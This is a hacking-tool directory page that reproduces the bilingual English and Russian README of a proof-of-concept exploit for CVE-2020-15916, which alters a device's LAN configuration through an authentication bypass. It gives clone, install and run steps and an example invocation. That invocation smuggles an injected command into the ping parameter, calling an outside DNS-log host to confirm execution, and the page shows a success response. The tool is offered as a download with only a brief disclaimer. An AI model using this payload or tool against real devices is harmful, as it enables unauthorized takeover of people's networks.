Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/geniuszly/cve-2020-15916
Payload GenerationExploitationWeb Application ExploitationNetwork SecurityLearning & Education
GitHubgeniuszly/cve-2020-15916

CVE-2020-15916

Proof-of-concept exploit for CVE-2020-15916, enabling unauthorized LAN configuration changes via weak authentication bypass and payload injection.

View Repository
3161 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

EN

GenLANConfigAttack - is a PoC for exploiting CVE-2020-15916, a vulnerability that allows unauthorized changes to the LAN configuration of a device.

Features

  • Exploits LAN configuration vulnerability
  • Sends malicious payload to alter network settings
  • Bypasses security mechanisms for gaining control over the LAN

How to Use

  1. Clone this repository:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2020-15916
    
  2. Install dependencies:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. Run the exploit:
    root@kitploit:~
    python GenLANConfigAttack.py
    

Parameters

  • target_ip: The IP address of the target device.
  • ping_command: Command to execute on the target device.
  • session_password: Password for session access.
  • Example

    root@kitploit:~
    python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
    
    root@kitploit:~
    [Response from 192.168.0.1]: 
    {"success":true,"message":"LAN IP configuration updated successfully"}
    

    CVE Reference

    This PoC is for the CVE-2020-15916 vulnerability, which allows attackers to alter the LAN configuration of vulnerable devices by exploiting a weak authentication mechanism.

    Disclaimer

    This tool is provided for educational purposes only. Use it responsibly and only in environments where you have explicit permission.

    RU

    GenLANConfigAttack представляет собой PoC для эксплуатации уязвимости CVE-2020-15916, которая позволяет несанкционированно изменять конфигурацию LAN устройства.

    Функции

    • Использует уязвимость конфигурации LAN
    • Отправляет вредоносный payload для изменения настроек сети
    • Обходит механизмы безопасности для получения контроля над LAN

    Как использовать

    1. Клонируйте репозиторий:
      root@kitploit:~
      git clone https://github.com/geniuszly/CVE-2020-15916
      
    2. Установите зависимости:
      root@kitploit:~
      pip install -r requirements.txt
      
    3. Запустите эксплойт:
      root@kitploit:~
      python GenLANConfigAttack.py
      

    Параметры

    • target_ip: IP-адрес целевого устройства.
    • ping_command: Команда для выполнения на целевом устройстве.
    • session_password: Пароль для сессионного доступа.

    Пример

    root@kitploit:~
    python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
    
    root@kitploit:~
    [Ответ от 192.168.0.1]: 
    {"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
    

    CVE-ссылка

    Этот PoC эксплуатирует уязвимость CVE-2020-15916, которая позволяет злоумышленникам изменять конфигурацию LAN на уязвимых устройствах, используя слабую аутентификацию.

    Отказ от ответственности

    Этот инструмент предоставляется исключительно в образовательных целях. Используйте его ответственно и только в тех средах, где у вас есть явное разрешение.

    Download Tool